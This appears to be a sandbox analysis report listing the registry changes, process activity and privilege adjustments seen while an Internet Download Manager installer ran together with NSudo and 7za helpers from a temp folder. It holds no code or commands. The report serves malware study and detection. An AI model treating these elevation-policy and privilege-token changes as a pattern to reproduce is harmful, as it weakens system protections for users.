Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\DragDrop C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\AppName = "IDMan.exe" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppName = "IEMonitor.exe" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{15B851AF-A4B9-43EF-97D3-28E1B4A5DB9B} C:\Program Files (x86)\Internet Download Manager\idmBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DownloadUI = "{7D11E719-FF90-479C-B0D7-96EB43EE55D7}" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4} C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{C950922F-897A-4E13-BA38-66C8AF2E0BF7}\ = "IIDMEFSAgent7" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\TypeLib\ = "{3BDFC55C-ED33-43BB-9A77-57C2AF4B56EF}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{33AEF752-FB86-4787-9ED1-6010528F5FA3}\TypeLib C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IDMIECC.IDMHelperLinksStorage\ = "IDMHelperLinksStorage Class" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F947660-8606-420A-BAC6-51B84DD22A47}\TypeLib C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IDMIECC.IDMIEHlprObj.1\ = "IDMIEHlprObj Class" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\Programmable C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6B9EB066-DA1F-4C0A-AC62-01AC892EF175} C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640} C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\Programmable C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDC7F8E-EB3D-4F9A-B693-216F07C94D74}\TypeLib\ = "{5518B636-6884-48CA-A9A7-1CFD3F3BA916}" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\ProgID C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\Programmable C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\TypeLib\ = "{3BDFC55C-ED33-43BB-9A77-57C2AF4B56EF}" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F947660-8606-420A-BAC6-51B84DD22A47}\ProgID C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F947660-8606-420A-BAC6-51B84DD22A47}\Elevation C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\Control C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6A89524B-E1B6-4D71-972A-8FD53F240936}\1.0\0\win32 C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\Version C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DownlWithIDM.V2LinkProcessor\ = "V2LinkProcessor Class" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F947660-8606-420A-BAC6-51B84DD22A47}\VersionIndependentProgID C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IDMGetAll.IDMAllLinksProcessor\CLSID\ = "{5312C54E-A385-46B7-B200-ABAF81B03935}" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IDMGetAll.IDMAllLinksProcessor.1\ = "IDMAllLinksProcessor Class" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DownlWithIDM.LinkProcessor\CLSID\ = "{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\ToolboxBitmap32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll, 101" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DownlWithIDM.IDMDwnlMgr.1\CLSID\ = "{7D11E719-FF90-479C-B0D7-96EB43EE55D7}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{C7798BD6-34AF-4925-B01C-450C9EAD2DD9}\TypeLib\ = "{3BDFC55C-ED33-43BB-9A77-57C2AF4B56EF}" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6B9EB066-DA1F-4C0A-AC62-01AC892EF175}\ = "IIDMEFSAgent2" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Wow6432Node\CLSID\{48f2566e-08f2-125c-c7f2-dd3a0bdb43b7}\Version\ = "44774" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\ProgID\ = "DownlWithIDM.V2LinkProcessor.1" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IDMGetAll.IDMAllLinksProcessor\CurVer C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F947660-8606-420A-BAC6-51B84DD22A47} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\MiscStatus C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{28670AE0-CAF4-4836-8418-0F456023EBF7}\NumMethods\ = "15" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\ProgID\ = "IDMGetAll.IDMAllLinksProcessor.1" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\Insertable C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F947660-8606-420A-BAC6-51B84DD22A47}\Programmable C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\VersionIndependentProgID C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\Programmable C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\Programmable C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\ProgID C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IDMIECC.IDMHelperLinksStorage\CLSID\ = "{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5518B636-6884-48CA-A9A7-1CFD3F3BA916}\1.0\0 C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A} C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IDMIECC.IDMHelperLinksStorage\CLSID\ = "{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IDMGetAll.IDMAllLinksProcessor.1\CLSID\ = "{5312C54E-A385-46B7-B200-ABAF81B03935}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AC746233-E9D3-49CD-862F-068F7B7CCCA4}\ = "IDMan.CIDMLinkTransmitter" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{33AEF752-FB86-4787-9ED1-6010528F5FA3}\ = "IIDMAllLinksProcessor" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\VersionIndependentProgID\ = "DownlWithIDM.V2LinkProcessor" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{13D4E387-BAB7-47E7-B3D7-3F01ABC463EA} C:\Program Files (x86)\Internet Download Manager\idmBroker.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C950922F-897A-4E13-BA38-66C8AF2E0BF7} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\PING.EXE N/A
N/A N/A C:\Windows\System32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
